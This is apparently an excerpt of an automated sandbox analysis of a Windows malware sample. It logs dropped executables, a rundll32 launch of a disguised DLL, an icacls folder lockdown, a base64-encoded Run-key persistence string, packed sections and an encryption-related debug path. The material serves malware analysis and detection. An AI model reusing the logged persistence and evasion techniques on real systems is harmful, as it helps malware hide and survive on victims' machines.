    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\352F.exe C:\Users\user\AppData\Local\Temp\352F.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\849F.exe C:\Users\user\AppData\Local\Temp\849F.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStartJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780bJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe"
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeProcess created: unknown unknown
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1128.tmpJump to behavior
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    Source: rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: rundll32.exe, rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\352F.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074C25D CreateToolhelp32Snapshot,Module32First,0_2_0074C25D
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b
    Source: 42FE.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
    Source: 352F.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
    Source: 17.0.42FE.exe.340000.0.unpack, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:1816:64:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_01
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3960
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4776
    Source: rundll32.exeString found in binary or memory: ./?.so;lua/lib/amd64/?.so;lua/lib/amd64/loadall.so
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: Binary string: netutils.pdbUGP source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: 352F.PDB3 source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbUGP source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdb source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdb source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\AppData\Local\Temp\352F.PDB source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdbUGP source: rundll32.exe, 0000000C.00000003.374891452.00000156F18D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.374604013.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: (PKo0C:\Windows\mscorlib.pdb source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdbUGP source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdb source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: fltLib.pdb source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cfgmgr32.pdbUGP source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdbUGP source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdb source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: psapi.pdbUGP source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msasn1.pdbUGP source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdbUGP source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dwmapi.pdbUGP source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdb source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: user32.pdbUGP source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdb source: rundll32.exe, 0000000C.00000003.378362910.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: win32u.pdb source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdb source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdbUGP source: rundll32.exe, 0000000C.00000003.371994060.00000156F17A0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dwmapi.pdb source: rundll32.exe, 0000000C.00000003.391980672.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: fltLib.pdbGCTL source: rundll32.exe, 0000000C.00000003.411457320.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: imm32.pdb source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 0000000C.00000003.381642575.00000156F18F5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdb source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdb source: rundll32.exe, 0000000C.00000003.381552796.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 0000000C.00000003.357527718.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdb source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msctf.pdbUGP source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ole32.pdbUGP source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: powrprof.pdb source: rundll32.exe, 0000000C.00000003.411390290.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msctf.pdb source: rundll32.exe, 0000000C.00000003.388939351.00000156F17AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.389131965.00000156F1930000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ole32.pdb source: rundll32.exe, 0000000C.00000003.411534915.00000156F17A4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdbUGP source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbUGP source: rundll32.exe, 0000000C.00000003.386518863.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: user32.pdb source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .pdb-H source: 352F.exe, 00000013.00000002.502370820.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: msasn1.pdb source: rundll32.exe, 0000000C.00000003.417704379.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000C.00000003.411302282.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: psapi.pdb source: rundll32.exe, 0000000C.00000003.394742994.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbUGP source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.392389951.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: netapi32.pdb source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdb source: rundll32.exe, 0000000C.00000003.375171512.00000156EF9E3000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cfgmgr32.pdb source: rundll32.exe, 0000000C.00000003.399831459.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbUGP source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdb source: rundll32.exe, 0000000C.00000003.356049880.00000156F14A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.355006773.00000156F1680000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.354216907.00000156F14A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbUGP source: rundll32.exe, 0000000C.00000003.411361309.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: netapi32.pdbUGP source: rundll32.exe, 0000000C.00000003.413933146.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdb source: rundll32.exe, 0000000C.00000003.391792177.00000156F12B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdbUGP source: rundll32.exe, 0000000C.00000003.392185369.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: 352F.exe, 00000013.00000002.611328292.0000000004103000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: netutils.pdb source: rundll32.exe, 0000000C.00000003.413979669.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdb source: rundll32.exe, 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdb source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeUnpacked PE file: 14.2.8EAD.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeUnpacked PE file: 18.2.A4A.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeUnpacked PE file: 29.2.ECAC.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeUnpacked PE file: 31.2.DC3D.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.xepexi:W;.bigisi:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\rirdbihUnpacked PE file: 11.2.rirdbih.400000.0.unpack .text:ER;.data:W;.xepexi:W;.bigisi:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeUnpacked PE file: 14.2.8EAD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\F207.exeUnpacked PE file: 15.2.F207.exe.400000.0.unpack .text:ER;.data:W;.yij:W;.xad:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\DE4C.exeUnpacked PE file: 16.2.DE4C.exe.400000.0.unpack .text:ER;.data:W;.hurenac:W;.lized:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeUnpacked PE file: 18.2.A4A.exe.400000.0.unpack .text:ER;.data:W;.lixo:W;.bobo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\9760.exeUnpacked PE file: 20.2.9760.exe.400000.0.unpack .text:ER;.data:W;.jav:W;.lutu:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\849F.exeUnpacked PE file: 23.2.849F.exe.400000.0.unpack .text:ER;.data:W;.vib:W;.nuroz:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeUnpacked PE file: 29.2.ECAC.exe.400000.0.unpack .text:ER;.data:W;.lixo:W;.bobo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeUnpacked PE file: 31.2.DC3D.exe.400000.0.unpack .text:ER;.data:W;.yaz:W;.katosa:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\1128.exeUnpacked PE file: 9.2.1128.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C595 push ecx; ret 0_2_0040C5A8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00752FDD push 6700D42Eh; retf 0_2_00752FE7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746CAD push ebp; retf 0_2_00746ED9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746C91 push ebp; retf 0_2_00746ED9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00752185 push 623D8A45h; retf 0_2_0075218A
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_004080AD push ecx; ret 9_2_004080C0
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00F2C608 push esp; retf 91AFh9_2_00F2C61D
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0040C595 push ecx; ret 11_2_0040C5A8
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD17916F84 push rax; ret 12_2_00007FFD17919222
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD17919088 push rax; ret 12_2_00007FFD17919089
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD17919070 push rax; retf 12_2_00007FFD17919071
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF980003 push esp; retf 91AFh12_2_00000156EF980009
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040A901 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_0040A901
    Source: FD42.exe.1.drStatic PE information: 0xC4D2730F [Wed Aug 22 01:19:11 2074 UTC]
    Source: file.exeStatic PE information: section name: .xepexi
    Source: file.exeStatic PE information: section name: .bigisi
    Source: 1AED.exe.1.drStatic PE information: section name: .mexatol
